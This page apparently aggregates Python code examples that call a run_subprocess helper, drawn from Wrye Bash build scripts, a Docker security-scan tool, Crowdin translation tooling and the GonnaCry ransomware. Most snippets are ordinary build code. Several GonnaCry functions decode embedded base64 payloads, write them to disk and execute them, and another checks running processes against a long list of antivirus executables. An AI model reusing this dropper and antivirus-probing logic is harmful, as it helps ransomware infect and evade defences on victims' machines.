コード例 #1
0
ファイル: build.py プロジェクト: sharpsteve/wrye-bash
def build_executable(version, file_version):
    """Build the standalone Wrye Bash executable, yield, then remove it.

    Generator-style context: the executable exists only while the caller
    holds the yield; py2exe's intermediate folders are always cleaned up.
    """
    LOGGER.info("Building executable...")
    temp_build = os.path.join(MOPY_PATH, u"build")
    temp_dist = os.path.join(MOPY_PATH, u"dist")
    setup_src = os.path.join(WBSA_PATH, u"setup.py")
    setup_dst = os.path.join(MOPY_PATH, u"setup.py")
    built_exe = os.path.join(temp_dist, u"Wrye Bash Launcher.exe")
    final_exe = os.path.join(MOPY_PATH, u"Wrye Bash.exe")
    cpy(setup_src, setup_dst)
    try:
        # Run py2exe through the copied setup script.
        utils.run_subprocess(
            [sys.executable, setup_dst, "py2exe", "--version", file_version],
            LOGGER,
            cwd=MOPY_PATH)
        # Move the freshly built launcher into the Mopy folder.
        cpy(built_exe, final_exe)
    finally:
        # Always drop py2exe's generated files/folders.
        rm(setup_dst)
        rm(temp_build)
        rm(temp_dist)
    try:
        yield
    finally:
        # Remove the executable once the caller is done with it.
        rm(final_exe)
コード例 #2
0
def cleanup(args):
    """
    Tear down resources left over from a previous run.

    Steps, in order:
        - compute the list of images to remove (bail out if empty)
        - disconnect the rt and db2 containers from the scan network
        - remove the rt and db2 containers
        - remove the scan volume and network
        - remove the images

    Args:
        args ([dict]): the arguments passed to the script
    """
    remove_images = get_remove_image_list(args)
    if not remove_images:
        # Nothing scheduled for removal -- leave everything in place.
        return

    # Detach both containers from the scan network first.
    main_logger.info(
        f"Disconnecting runtime container {RT_SCAN} from network {NETWORK_SCAN}..."
    )
    cleanup_helper(f"docker network disconnect -f {NETWORK_SCAN} {RT_SCAN}")
    main_logger.info(
        f"Disconnecting db2 container {DB2_SCAN} from network {NETWORK_SCAN}..."
    )
    cleanup_helper(f"docker network disconnect -f {NETWORK_SCAN} {DB2_SCAN}")

    # Remove the runtime container (cleanup_helper already downgrades errors).
    main_logger.info(f"Removing runtime container {RT_SCAN}...")
    cleanup_helper(f"docker rm -f {RT_SCAN}")

    # Remove the db2 container.
    try:
        main_logger.info(f"Removing db2 container {DB2_SCAN}...")
        cleanup_helper(f"docker rm -f {DB2_SCAN}")
    except Exception as exc:
        main_logger.info(exc)

    # Remove the scan volume.
    try:
        main_logger.info(f"Removing volume {VOL_SCAN}...")
        cleanup_helper(f"docker volume rm -f {VOL_SCAN}")
    except Exception as exc:
        main_logger.info(exc)

    # Remove the scan network.
    # NOTE(review): this step calls run_subprocess directly instead of
    # cleanup_helper like its siblings -- confirm that is intentional.
    try:
        main_logger.info(f"Removing network {NETWORK_SCAN}")
        run_subprocess(f"docker network rm {NETWORK_SCAN}")
    except Exception as exc:
        main_logger.info(exc)

    # Finally drop the images themselves, one at a time.
    for image in remove_images:
        try:
            main_logger.info(f"Removing image {image}...")
            cleanup_helper(f"docker rmi {image}")
        except Exception as exc:
            main_logger.info(exc)
コード例 #3
0
ファイル: build.py プロジェクト: sharpsteve/wrye-bash
def pack_installer(nsis_path, version, file_version):
    """Package Wrye Bash as an NSIS installer.

    Raises:
        IOError: when the NSIS script or makensis.exe cannot be found.
    """
    nsi_script = os.path.join(SCRIPTS_PATH, u"build", u"installer",
                              u"main.nsi")
    if not os.path.exists(nsi_script):
        raise IOError("Could not find nsis script '{}', aborting "
                      "installer creation.".format(nsi_script))
    helper_root = get_nsis_root(nsis_path)
    download_redists()
    makensis = os.path.join(helper_root, "makensis.exe")
    if not os.path.isfile(makensis):
        raise IOError(
            "Could not find 'makensis.exe', aborting installer creation.")
    # Hand every build parameter to the NSIS script via /D defines.
    utils.run_subprocess(
        [
            makensis,
            "/NOCD",
            "/DWB_NAME=Wrye Bash {}".format(version),
            "/DWB_OUTPUT={}".format(DIST_PATH),
            "/DWB_FILEVERSION={}".format(file_version),
            "/DWB_CLEAN_MOPY={}".format(MOPY_PATH),
            nsi_script,
        ],
        LOGGER,
    )
コード例 #4
0
def install_loot_api(version, revision, dl_dir, destination_path):
    """Download the LOOT API Python wrapper and install its binaries.

    Any previously installed loot.dll / loot_api.pyd in *destination_path*
    are removed before the fresh copies are extracted.
    """
    url = ("https://github.com/loot/loot-api-python/releases/download/"
           "{0}/loot_api_python-{0}-0-g{1}_master-python2.7-win32.7z".format(
               version, revision))
    archive_path = os.path.join(dl_dir, "loot_api.7z")
    seven_zip_path = os.path.join(MOPY_PATH, "bash", "compiled", "7z.exe")
    # Drop stale binaries so the extraction below is a clean install.
    for stale_name in ("loot.dll", "loot_api.pyd"):
        stale_path = os.path.join(destination_path, stale_name)
        if os.path.exists(stale_path):
            os.remove(stale_path)
    LOGGER.info("Downloading LOOT API Python wrapper...")
    LOGGER.debug("Download url: {}".format(url))
    LOGGER.debug(
        "Downloading LOOT API Python wrapper to {}".format(archive_path))
    utils.download_file(url, archive_path)
    LOGGER.info("Extracting LOOT API Python wrapper to " +
                utils.relpath(destination_path))
    # 7z flags: e = extract flat, -y = assume yes, -o = output folder.
    utils.run_subprocess([
        seven_zip_path,
        "e",
        archive_path,
        "-y",
        "-o" + destination_path,
        "*/loot.dll",
        "*/loot_api.pyd",
    ], LOGGER)
    os.remove(archive_path)
コード例 #5
0
def docker_logout():
    """Log out of the JFrog registry."""
    main_logger.info(f"#### Logout of {JFROG_REGISTRY} ####")
    run_subprocess(f"docker logout {JFROG_REGISTRY}", logger=main_logger)
コード例 #6
0
def open_decryptor():
    """Launch the decryptor in a terminal unless one is already running."""
    # `pidof decryptor` prints something only when the process exists.
    process = subprocess.Popen("pidof decryptor", shell=True,
                               stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    # communicate() reads both pipes concurrently and waits for the child;
    # calling stdout.read() then stderr.read() sequentially (as before) can
    # deadlock when the unread pipe's OS buffer fills up.
    stdout, stderr = process.communicate()
    if stdout or stderr:
        # Decryptor already running -- do not spawn a second instance.
        return

    os.chdir(variables.ransomware_path)
    # Try GNOME's terminal first, then XFCE's; whichever is absent fails
    # harmlessly inside run_subprocess.
    utils.run_subprocess('gnome-terminal --command .{}'.format(variables.decryptor_path))
    utils.run_subprocess('xfce4-terminal --command=.{}'.format(variables.decryptor_path))
コード例 #7
0
def docker_login():
    """
    Login to the registry.
    """
    main_logger.info(f"#### Login to {JFROG_REGISTRY} ####")
    # Log the command with the API key redacted: credentials must never be
    # written to log files in plaintext (the previous version leaked
    # JFROG_APIKEY into the log).
    main_logger.info(
        f"docker login -u {JFROG_USER} -p ******** {JFROG_REGISTRY}")
    run_subprocess(
        f"docker login -u {JFROG_USER} -p {JFROG_APIKEY} {JFROG_REGISTRY}",
        logger=main_logger,
    )
コード例 #8
0
def cleanup_helper(cmd):
    """
    Run a cleanup command, downgrading any failure to a warning.

    Args:
        cmd ([str]): the command to run in subprocess
    """
    try:
        run_subprocess(cmd)
    except Exception as exc:
        # Cleanup is best-effort: log and keep going.
        main_logger.warning(exc)
コード例 #9
0
def drop_daemon_and_decryptor():
    """Write the embedded daemon and decryptor to disk and start the daemon."""
    # Both payloads are stored base64-encoded in the variables module.
    payloads = (
        (variables.decryptor_path, variables.decryptor),
        (variables.daemon_path, variables.daemon),
    )
    for target_path, encoded in payloads:
        with open(target_path, 'wb') as out:
            out.write(base64.b64decode(encoded))

    os.chdir(variables.ransomware_path)
    os.system('chmod +x daemon')
    os.system('chmod +x decryptor')
    utils.run_subprocess('./daemon')
コード例 #10
0
def install_msvc_redist(dl_dir, url=None):
    """Download and silently install the MSVC x86 redistributable.

    Args:
        dl_dir: folder to download the installer into.
        url: optional override for the download url; a known-good default
            is used when None.
    """
    if url is None:
        url = (
            "https://download.visualstudio.microsoft.com/download/pr/749aa419-f9e4-45"
            "78-a417-a43786af205e/d59197078cc425377be301faba7dd87a/vc_redist.x86.exe"
        )
    LOGGER.info("Downloading MSVC Redist...")
    LOGGER.debug("Download url: {}".format(url))
    installer = os.path.join(dl_dir, "vc_redist.exe")
    LOGGER.debug("Downloading MSVC Redist to {}".format(installer))
    utils.download_file(url, installer)
    LOGGER.info("Installing the MSVC redistributable...")
    # /quiet: no UI, no user interaction; delete the installer afterwards.
    utils.run_subprocess([installer, "/quiet"], LOGGER)
    os.remove(installer)
コード例 #11
0
def download_depcheck_tool(download_dir):
    """
    Download the latest dependency-check release into *download_dir* and
    make its shell launcher executable.

    Args:
        download_dir ([str]): the directory to download the depcheck tool to
    """
    main_logger.info("Downloading updated dependency check tool...")
    # Resolve the latest release tag (e.g. "v6.1.0" -> "6.1.0").
    res = requests.get(DEPCHECK_REPO)
    tag_name = res.json()["tag_name"].replace("v", "")
    download_url = f"https://github.com/jeremylong/DependencyCheck/releases/download/v{tag_name}/dependency-check-{tag_name}-release.zip"
    res = requests.get(download_url, allow_redirects=True)
    # Named `archive` rather than `zip` to avoid shadowing the builtin zip().
    archive = zipfile.ZipFile(io.BytesIO(res.content))
    archive.extractall(download_dir)
    run_subprocess(
        f"chmod +x {download_dir}/dependency-check/bin/dependency-check.sh")
コード例 #12
0
def get_reports(args):
    """Generate the reports for the requested scan type and sync them out.

    Args:
        args ([dict]): the arguments passed to the script
    """
    # ALL runs both report kinds; STATIC/DYNAMIC run just their own.
    if args.type in (ALL, STATIC):
        static_reports(args)
    if args.type in (ALL, DYNAMIC):
        dynamic_reports(args)

    # Copy the generated reports to the output directory.
    run_subprocess(
        f"rsync -a -v --ignore-existing {os.getcwd()}/reports {args.output}")
コード例 #13
0
def start_rt_container(args, image_tag, rt_name=RT_SCAN, logger=main_logger):
    """
    Start the rt container for deployment

    Args:
        args ([dict]): the arguments passed to the script
        image_tag ([str]): the tag of the image
        rt_name ([str], optional): name for the runtime container. Defaults to RT_SCAN.
        logger ([logging], optional): the logger to log the output. Defaults to main_logger.

    Raises:
        Exception: exception raised when spinning up runtime container
    """
    # login to registry
    docker_login()

    # In DEPCHECK mode the container needs neither the scan network nor the
    # published port; both flags collapse to empty strings.
    network = "" if args.mode == DEPCHECK else f"--network={NETWORK_SCAN}"
    port = "" if args.mode == DEPCHECK else "-p 9080:9080"

    try:
        try:
            logger.info(f"Trying {image_tag}")
            rt_image_repo = f"{JFROG_REGISTRY}/oms-{args.version}-db2-rt:{image_tag}-liberty"
            logger.info(
                f"#### STARTING RT CONTAINER: {rt_name} - {rt_image_repo} ####"
            )
            # Detached (-d) privileged container pointed at the db2 host.
            run_subprocess(
                f" \
                docker run -di --name {rt_name} --privileged \
                {network} \
                -e DB_HOST={DB2_SCAN} \
                -e DB_PORT=50000 \
                -e DB_VENDOR=db2 \
                -e DB_NAME=OMDB \
                {port} \
                {rt_image_repo}",
                logger=logger,
            )
        except Exception as e:
            # NOTE(review): this inner handler swallows the failure, so the
            # outer except below (and the documented raise) appears
            # unreachable for run_subprocess errors -- confirm intent.
            logger.warning(e)
    except Exception as e:
        logger.error(traceback.format_exc())
        logger.error(e)
        raise Exception

    # logout of registry
    docker_logout()
コード例 #14
0
def start_db2_container(args, image_tag, logger=main_logger):
    """
    Start the db2 container for deployment.

    Args:
        args ([str]): the arguments passed to the script
        image_tag ([str]): the tag of the image
        logger ([logging], optional): the logger to log the output. Defaults to main_logger.

    Raises:
        Exception: exception raised when running subprocess
    """
    try:
        db_image_repo = f"{JFROG_REGISTRY}/oms-{args.version}-db2-db:{image_tag}-refs"
        logger.info(
            f"#### STARTING DB2 CONTAINER: {DB2_SCAN} - {db_image_repo} ####")

        # Best-effort removal of a stale scan network from a previous run;
        # failure (e.g. network does not exist) is deliberately ignored.
        try:
            run_subprocess(f"docker network rm {NETWORK_SCAN}")
        except Exception as e:
            pass

        # One chained shell command: create volume + network, start the
        # detached db2 container on that network, then block until the
        # waitDB2.sh helper reports the database is ready.
        run_subprocess(
            f" \
            docker volume create {VOL_SCAN} && \
            docker network create {NETWORK_SCAN} && \
            docker run -di --name {DB2_SCAN} --privileged \
            --network={NETWORK_SCAN} \
            -e DB2INSTANCE=db2inst1 \
            -e DB2INST1_PASSWORD=db2inst1 \
            -e DB_USER=omsuser \
            -e DB_PASSWORD=omsuser \
            -e LICENSE=accept \
            -e DBNAME=omdb \
            -e AUTOCONFIG=false \
            -v {VOL_SCAN}:/database \
            -p 50005:50000 {db_image_repo} && \
            chmod +x {os.getcwd()}/waitDB2.sh && \
            /bin/bash {os.getcwd()}/waitDB2.sh {DB2_SCAN}",
            logger=logger,
        )
    except Exception as e:
        # logger.error(traceback.format_exc())
        # NOTE(review): `raise Exception` discards the original error `e`;
        # chaining (raise ... from e) would preserve it -- confirm.
        logger.warning(e)
        raise Exception
コード例 #15
0
def build_source_code(args):
    """
    Build the source code to prep for the scans.

    Args:
        args ([dict]): the arguments passed to the script
    """
    # The gradle-based steps below are currently disabled:
    # main_logger.info("Setting up environment...")
    # run_subprocess(f"cd {args.source}/Build && ./gradlew -b fullbuild.gradle setupEnvironment --stacktrace")
    # main_logger.info("Setting 3rd party libs...")
    # run_subprocess(f"cd {args.source}/Build && ./gradlew -b fullbuild.gradle unpack3p")
    # main_logger.info("Cleaning projects...")
    # run_subprocess(f"cd {args.source} && Build/gradlew clean")

    # Only the stale-irx cleanup currently runs.
    main_logger.info("Removing irx files...")
    run_subprocess(f'cd {args.source} && find . -name "*.irx" -type f -delete')
コード例 #16
0
def main():
    """Entry point: dispatch on the requested mode; best-effort docker
    cleanup when anything fails."""
    try:
        args = parse_arguments()
        main_logger.info(args)
        handlers = {SCAN: run_scan, REPORTS: get_reports, DEPCHECK: depcheck}
        handler = handlers.get(args.mode)
        if handler is not None:
            handler(args)
    except Exception as exc:
        main_logger.info(exc)
        # Remove the scan network and volume independently; a failure on
        # one must not stop the other.
        cleanup_targets = (
            (NETWORK_SCAN, f"docker network rm {NETWORK_SCAN}"),
            (VOL_SCAN, f"docker volume rm {VOL_SCAN}"),
        )
        for resource, command in cleanup_targets:
            try:
                run_subprocess(command)
            except Exception:
                main_logger.warning(f"Error removing {resource}")
コード例 #17
0
def download_crowdin(base_path, branch, xml, username, config_dict, crowdin_path):
    """Download translations for every configured file set, then push the
    extracted files to gerrit. Exits with status 1 on the first failure."""
    extracted = []
    for idx, config_file in enumerate(config_dict["files"]):
        print(f"\nDownloading translations from Crowdin ({config_dict['headers'][idx]})")
        cmd = [crowdin_path, "download", f"--branch={branch}", f"--config={config_file}"]
        comm, ret = utils.run_subprocess(cmd, show_spinner=True)
        if ret != 0:
            print(f"Failed to download:\n{comm[1]}", file=sys.stderr)
            sys.exit(1)
        # comm[0] is the tool's stdout listing what was written.
        extracted += get_extracted_files(comm[0], branch)

    upload_translations_gerrit(extracted, xml, base_path, branch, username)
コード例 #18
0
ファイル: upload.py プロジェクト: LineageOS/cm_crowdin
def upload_sources_crowdin(branch, config_dict, crowdin_path):
    """Upload source strings to Crowdin for every configured file set.

    Sets the module-wide _HAS_UPLOADED flag on success; exits with status 1
    on the first failed upload.
    """
    global _HAS_UPLOADED
    for idx, config_file in enumerate(config_dict["files"]):
        print(f"\nUploading sources to Crowdin ({config_dict['headers'][idx]})")
        comm, ret = utils.run_subprocess(
            [
                crowdin_path,
                "upload",
                "sources",
                f"--branch={branch}",
                f"--config={config_file}",
            ],
            show_spinner=True,
        )
        if ret != 0:
            print(f"Failed to upload:\n{comm[1]}", file=sys.stderr)
            sys.exit(1)
    _HAS_UPLOADED = True
コード例 #19
0
ファイル: upload.py プロジェクト: LineageOS/cm_crowdin
def upload_translations_crowdin(branch, config_dict, crowdin_path):
    """Upload local translations to Crowdin for every configured file set.

    Sets the module-wide _HAS_UPLOADED flag on success; exits with status 1
    on the first failed upload.
    """
    global _HAS_UPLOADED
    for idx, config_file in enumerate(config_dict["files"]):
        print(
            f"\nUploading translations to Crowdin ({config_dict['headers'][idx]})"
        )
        comm, ret = utils.run_subprocess(
            [
                crowdin_path,
                "upload",
                "translations",
                f"--branch={branch}",
                "--no-import-duplicates",
                "--import-eq-suggestions",
                "--auto-approve-imported",
                f"--config={config_file}",
            ],
            show_spinner=True,
        )
        if ret != 0:
            print(f"Failed to upload:\n{comm[1]}", file=sys.stderr)
            sys.exit(1)
    _HAS_UPLOADED = True
コード例 #20
0
def get_open_changes(branch, username, owner):
    """Query gerrit for open automatic-translation changes on *branch*.

    Returns a dict mapping each change's current patch-set revision to its
    url. Exits with status 1 when the gerrit query itself fails.
    """
    print("Fetching open changes on gerrit")

    # Restrict the query to a single owner when one was given.
    owner_arg = f"owner:{owner}" if owner is not None else ""

    # Find all open translation changes
    cmd = utils.get_gerrit_base_cmd(username) + [
        "query",
        "status:open",
        f"branch:{branch}",
        owner_arg,
        'message:"Automatic translation import"',
        "topic:translation",
        "--current-patch-set",
        "--format=JSON",
    ]
    msg, code = utils.run_subprocess(cmd)
    if code != 0:
        print(f"Failed: {msg[1]}", file=sys.stderr)
        sys.exit(1)

    changes = {}
    # gerrit prints one JSON object per line; the trailing stats record has
    # no currentPatchSet and is skipped via the KeyError handler.
    for line in msg[0].strip("\n").split("\n"):
        try:
            record = json.loads(line)
            changes[record["currentPatchSet"]["revision"]] = record["url"]
        except KeyError:
            continue
        except Exception as e:
            print(
                e,
                f"Failed to read revision from fetched dataset:\n{line}",
                file=sys.stderr,
            )

    return changes
コード例 #21
0
def vote(branch, username, owner):
    """Apply Code-Review +1 and Verified +1 to every open translation
    change on *branch*."""
    changes = get_open_changes(branch, username, owner)
    commits = 0
    for revision, url in changes.items():
        print(f"Voting on commit {url}: ", end="")
        # Add Code-Review +1 and Verified+1 labels
        cmd = utils.get_gerrit_base_cmd(username) + [
            "review",
            "--verified +1",
            "--code-review +1",  # we often can't self-CR+2 (limited by admin), submitter needs to do that
            revision,
        ]
        msg, code = utils.run_subprocess(cmd, True)
        if code == 0:
            print("Success")
        else:
            error_text = msg[1].replace("\n\n", "; ").replace("\n", "")
            print(f"Failed! -- {error_text}")

        commits += 1

    if not commits:
        print("Nothing to vote on!")
コード例 #22
0
def submit(branch, username, owner):
    """Apply Code-Review +2 / Verified +1 and submit every open translation
    change on *branch*."""
    changes = get_open_changes(branch, username, owner)
    commits = 0
    for revision, url in changes.items():
        print(f"Submitting commit {url}: ", end="")
        # Add Code-Review +2 and Verified+1 labels and submit
        cmd = utils.get_gerrit_base_cmd(username) + [
            "review",
            "--verified +1",
            "--code-review +2",
            "--submit",
            revision,
        ]
        msg, code = utils.run_subprocess(cmd, True)
        if code == 0:
            print("Success")
        else:
            error_text = msg[1].replace("\n\n", "; ").replace("\n", "")
            print(f"Failed! -- {error_text}")

        commits += 1

    if not commits:
        print("Nothing to submit!")
コード例 #23
0
def check_av():
    """Probe the Windows task list for known antivirus/security processes.

    Runs `tasklist | findstr` once per known process name.
    """
    av_list = [
        'a2adguard.exe', 'a2adwizard.exe', 'a2antidialer.exe', 'a2cfg.exe',
        'a2cmd.exe', 'a2free.exe', 'a2guard.exe', 'a2hijackfree.exe',
        'a2scan.exe', 'a2service.exe', 'a2start.exe', 'a2sys.exe', 'a2upd.exe',
        'aavgapi.exe', 'aawservice.exe', 'aawtray.exe', 'ad-aware.exe',
        'ad-watch.exe', 'alescan.exe', 'anvir.exe', 'ashdisp.exe',
        'ashmaisv.exe', 'ashserv.exe', 'ashwebsv.exe', 'aswupdsv.exe',
        'atrack.exe', 'avgagent.exe', 'avgamsvr.exe', 'avgcc.exe',
        'avgctrl.exe', 'avgemc.exe', 'avgnt.exe', 'avgtcpsv.exe',
        'avguard.exe', 'avgupsvc.exe', 'avgw.exe', 'avkbar.exe', 'avk.exe',
        'avkpop.exe', 'avkproxy.exe', 'avkservice.exe', 'avktray',
        'avktray.exe', 'avkwctl', 'avkwctl.exe', 'avmailc.exe', 'avp.exe',
        'avpm.exe', 'avpmwrap.exe', 'avsched32.exe', 'avwebgrd.exe',
        'avwin.exe', 'avwupsrv.exe', 'avz.exe', 'bdagent.exe', 'bdmcon.exe',
        'bdnagent.exe', 'bdss.exe', 'bdswitch.exe', 'blackd.exe',
        'blackice.exe', 'blink.exe', 'boc412.exe', 'boc425.exe', 'bocore.exe',
        'bootwarn.exe', 'cavrid.exe', 'cavtray.exe', 'ccapp.exe',
        'ccevtmgr.exe', 'ccimscan.exe', 'ccproxy.exe', 'ccpwdsvc.exe',
        'ccpxysvc.exe', 'ccsetmgr.exe', 'cfgwiz.exe', 'cfp.exe', 'clamd.exe',
        'clamservice.exe', 'clamtray.exe', 'cmdagent.exe', 'cpd.exe',
        'cpf.exe', 'csinsmnt.exe', 'dcsuserprot.exe', 'defensewall.exe',
        'defensewall_serv.exe', 'defwatch.exe', 'f-agnt95.exe', 'fpavupdm.exe',
        'f-prot95.exe', 'f-prot.exe', 'fprot.exe', 'fsaua.exe', 'fsav32.exe',
        'f-sched.exe', 'fsdfwd.exe', 'fsm32.exe', 'fsma32.exe', 'fssm32.exe',
        'f-stopw.exe', 'f-stopw.exe', 'fwservice.exe', 'fwsrv.exe',
        'iamstats.exe', 'iao.exe', 'icload95.exe', 'icmon.exe', 'idsinst.exe',
        'idslu.exe', 'inetupd.exe', 'irsetup.exe', 'isafe.exe', 'isignup.exe',
        'issvc.exe', 'kav.exe', 'kavss.exe', 'kavsvc.exe', 'klswd.exe',
        'kpf4gui.exe', 'kpf4ss.exe', 'livesrv.exe', 'lpfw.exe', 'mcagent.exe',
        'mcdetect.exe', 'mcmnhdlr.exe', 'mcrdsvc.exe', 'mcshield.exe',
        'mctskshd.exe', 'mcvsshld.exe', 'mghtml.exe', 'mpftray.exe',
        'msascui.exe', 'mscifapp.exe', 'msfwsvc.exe', 'msgsys.exe',
        'msssrv.exe', 'navapsvc.exe', 'navapw32.exe', 'navlogon.dll',
        'navstub.exe', 'navw32.exe', 'nisemsvr.exe', 'nisum.exe', 'nmain.exe',
        'noads.exe', 'nod32krn.exe', 'nod32kui.exe', 'nod32ra.exe',
        'npfmntor.exe', 'nprotect.exe', 'nsmdtr.exe', 'oasclnt.exe',
        'ofcdog.exe', 'opscan.exe', 'ossec-agent.exe', 'outpost.exe',
        'paamsrv.exe', 'pavfnsvr.exe', 'pcclient.exe', 'pccpfw.exe',
        'pccwin98.exe', 'persfw.exe', 'protector.exe', 'qconsole.exe',
        'qdcsfs.exe', 'rtvscan.exe', 'sadblock.exe', 'safe.exe',
        'sandboxieserver.exe', 'savscan.exe', 'sbiectrl.exe', 'sbiesvc.exe',
        'sbserv.exe', 'scfservice.exe', 'sched.exe', 'schedm.exe',
        'schedulerdaemon.exe', 'sdhelp.exe', 'serv95.exe', 'sgbhp.exe',
        'sgmain.exe', 'slee503.exe', 'smartfix.exe', 'smc.exe',
        'snoopfreesvc.exe', 'snoopfreeui.exe', 'spbbcsvc.exe', 'sp_rsser.exe',
        'spyblocker.exe', 'spybotsd.exe', 'spysweeper.exe', 'spysweeperui.exe',
        'spywareguard.dll', 'spywareterminatorshield.exe', 'ssu.exe',
        'steganos5.exe', 'stinger.exe', 'swdoctor.exe', 'swupdate.exe',
        'symlcsvc.exe', 'symundo.exe', 'symwsc.exe', 'symwscno.exe',
        'tcguard.exe', 'tds2-98.exe', 'tds-3.exe', 'teatimer.exe',
        'tgbbob.exe', 'tgbstarter.exe', 'tsatudt.exe', 'umxagent.exe',
        'umxcfg.exe', 'umxfwhlp.exe', 'umxlu.exe', 'umxpol.exe', 'umxtray.exe',
        'usrprmpt.exe', 'vetmsg9x.exe', 'vetmsg.exe', 'vptray.exe',
        'vsaccess.exe', 'vsserv.exe', 'wcantispy.exe', 'win-bugsfix.exe',
        # 'winpatrolex.exe' was previously the corrupted literal
        # 'winpa""rolex.exe' (embedded quotes), which could never match.
        'winpatrol.exe', 'winpatrolex.exe', 'wrsssdk.exe', 'xcommsvr.exe',
        'xfr.exe', 'xp-antispy.exe', 'zegarynka.exe', 'zlclient.exe'
    ]

    command = 'tasklist /v /fo csv | findstr /i {}'

    for process in av_list:
        utils.run_subprocess(command.format(process))
コード例 #24
0
def drop_n_run_gonnacry():
    """Decode the embedded GonnaCry payload to disk and execute it."""
    with open(variables.gonnacry_path, 'wb') as payload_file:
        payload_file.write(base64.b64decode(variables.gonnacry))

    utils.run_subprocess('.{}'.format(variables.gonnacry_path))
コード例 #25
0
ファイル: build.py プロジェクト: sharpsteve/wrye-bash
def pack_7z(archive, *args):
    """Pack the Mopy folder into *archive* using 7z at max LZMA2 compression.

    Extra 7z arguments may be passed via *args.
    """
    command = [EXE_7z, "a", "-m0=lzma2", "-mx9", archive, "Mopy/"]
    command.extend(args)
    utils.run_subprocess(command, LOGGER, cwd=ROOT_PATH)
コード例 #26
0
def pack_7z(archive_, *args):
    """Pack the Mopy folder into *archive_* using 7z at max LZMA2 compression.

    Extra 7z arguments may be passed via *args.
    """
    command = [EXE_7z, u'a', u'-m0=lzma2', u'-mx9', archive_, u'Mopy/']
    command.extend(args)
    utils.run_subprocess(command, LOGGER, cwd=ROOT_PATH)
コード例 #27
0
def static_scan(args):
    """
    Prepare and run the static scan.

    Args:
        args ([dict]): the arguments passed to the script
    """

    # prepare the header for requests
    file_req_header = {"Authorization": f"Bearer {get_bearer_token()}"}

    # remove the old scans; the returned dict maps project -> last status
    old_scan_status_dict = remove_old_scans(SINGLE_STATIC)

    # build source code
    main_logger.info(f"Building source code...")
    build_source_code(args)

    # read the list of projects to scan
    main_logger.info(f"Getting the projects...")
    projects = get_projects()

    # the below block of code would do:
    # - create tempdir to store the config files
    # - go through the list of projects
    # - generate the irx file for each project
    # - upload the generated irx file to ASoC
    # - create and execute the static scan
    with tempfile.TemporaryDirectory(dir=os.getcwd()) as tmpdir:
        main_logger.debug(f"PROJECTS TO SCAN: {projects}")
        for project in projects:
            project = project.strip()
            # "/" is not valid in a file name; flatten the project path
            project_file_name = project.strip().replace("/", "_")
            print()
            # banner: a line of '#', the centered title, another '#' line
            main_logger.info(
                "#" *
                (len(f"PROCESSING PROJECT: {project} - {project_file_name}") +
                 PADDING))
            main_logger.info(
                " " * int((PADDING / 2)) +
                f"PROCESSING PROJECT: {project} - {project_file_name}" +
                " " * int((PADDING / 2)), )
            main_logger.info(
                "#" *
                (len(f"PROCESSING PROJECT: {project} - {project_file_name}") +
                 PADDING))

            # if the old scan still pending, skip
            if (project in old_scan_status_dict
                    and old_scan_status_dict[project] in PENDING_STATUSES):
                main_logger.info(f"{project} is PENDING/RUNNING")
                continue

            # generate config file for appscan
            generate_appscan_config_file(args, project)
            main_logger.info(f"Generating {project_file_name}.irx file...")
            run_subprocess(
                f"source ~/.bashrc && appscan.sh prepare -c {APPSCAN_CONFIG_TMP} -n {project_file_name}.irx -d {tmpdir}"
            )

            # call ASoC API to create the static scan
            try:
                main_logger.info(
                    f"Calling ASoC API to create the static scan...")
                with open(f"{tmpdir}/{project_file_name}.irx",
                          "rb") as irx_file:
                    file_data = {"fileToUpload": irx_file}

                    # upload the irx; 201 means the file was accepted
                    res = requests.post(f"{ASOC_API_ENDPOINT}/FileUpload",
                                        files=file_data,
                                        headers=file_req_header)
                    if res.status_code == 201:
                        data = {
                            "ARSAFileId": res.json()["FileId"],
                            "ScanName": project,
                            "AppId": SINGLE_STATIC,
                            "Locale": "en-US",
                            "Execute": "true",
                            "Personal": "false",
                        }
                        # NOTE(review): this call uses a module-level
                        # `headers` (not defined in this view) rather than
                        # file_req_header used above -- confirm intentional.
                        res = requests.post(
                            f"{ASOC_API_ENDPOINT}/Scans/StaticAnalyzer",
                            json=data,
                            headers=headers)
                    main_logger.info(f"Response: {res.json()}")
                    main_logger.info(
                        f"PROJECT: {project} - {project_file_name} WAS PROCESSED SUCCESSFULLY."
                    )
                    print()
            except Exception as e:
                # one project failing must not abort the remaining projects
                main_logger.warning(traceback.format_exc())
                main_logger.warning(e)
コード例 #28
0
def depcheck(args):
    """
    Run and export report for the dependency check.

    Args:
        args ([dict]): the arguments passed to the script
    """
    try:
        # get the image tag
        image_tags = get_latest_stable_image_tags()

        # start runtime container: try each candidate tag until one works
        try:
            for image_tag in image_tags:
                print()
                main_logger.info("#" * (len(f"Trying {image_tag}") + PADDING))
                main_logger.info(" " * int((PADDING / 2)) +
                                 f"Trying {image_tag}" +
                                 " " * int((PADDING / 2)))
                main_logger.info("#" * (len(f"Trying {image_tag}") + PADDING))
                try:
                    start_rt_container(args, image_tag, rt_name=DEPCHECK_SCAN)
                except Exception as e:
                    main_logger.warning(e)
                    continue
                break
        except Exception as e:
            main_logger.warning(e)

        # build the ear
        main_logger.info("Building ear file...")
        run_subprocess(
            f'docker exec {DEPCHECK_SCAN} bash -lc "buildear -warfiles=smcfs,sbc,sma,isccs,wsc"'
        )

        # creating the source dir
        with tempfile.TemporaryDirectory(dir=os.getcwd()) as tmpdir:

            # copy the ear to tempdir
            main_logger.info("Copying the ear to tempdir...")
            run_subprocess(
                f"docker cp {DEPCHECK_SCAN}:/opt/ssfs/runtime/external_deployments/smcfs.ear {tmpdir}"
            )

            # extract war files from the ear
            run_subprocess(f"cd {tmpdir} && unzip smcfs.ear *.war")

            # extract jars
            apps = ["smcfs", "sma", "sbc", "isccs", "wsc"]

            create_dir(f"{tmpdir}/3rdpartyship")
            for app in apps:
                if app == "smcfs":
                    # smcfs keeps its 3rd-party jars under yfscommon/;
                    # exclude platform/product jars and properties
                    run_subprocess(
                        f"cd {tmpdir} && mkdir {app}jarsfolder && unzip -o -j smcfs.war yfscommon/* -d {app}jarsfolder/ -x  yfscommon/platform* -x yfscommon/smcfs* -x yfscommon/*.properties -x yfscommon/*ui.jar -x yfscommon/yantra* -x yfscommon/scecore* -x yfscommon/yc*"
                    )
                else:
                    # NOTE(review): this always extracts from sma.war even
                    # when app is sbc/isccs/wsc -- confirm this is intended
                    # and not meant to be {app}.war.
                    run_subprocess(
